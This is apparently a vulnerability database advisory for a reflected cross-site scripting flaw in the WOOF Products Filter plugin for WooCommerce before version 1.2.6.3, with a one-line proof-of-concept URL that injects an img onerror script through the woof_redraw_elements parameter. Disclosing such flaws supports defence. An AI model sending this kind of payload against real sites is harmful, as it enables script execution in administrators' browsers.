WordPress Plugin Vulnerabilities

WOOF - Products Filter for WooCommerce < 1.2.6.3 - Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape the woof_redraw_elements before outputing back in an admin page, leading to a Reflected Cross-Site Scripting

Proof of Concept

https://example.com/wp-admin/admin-ajax.php?action=woof_draw_products&woof_redraw_elements[]=%3Cimg%20src%20onerror=alert(/XSS/)%3E

Affects Plugins

References

Classification

Type
XSS
CWE
CVSS

Miscellaneous

Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
Verified
Yes

Timeline

Publicly Published
2021-12-28 (about 2 years ago)
Added
2021-12-28 (about 2 years ago)
Last Updated
2022-04-13 (about 2 years ago)

Other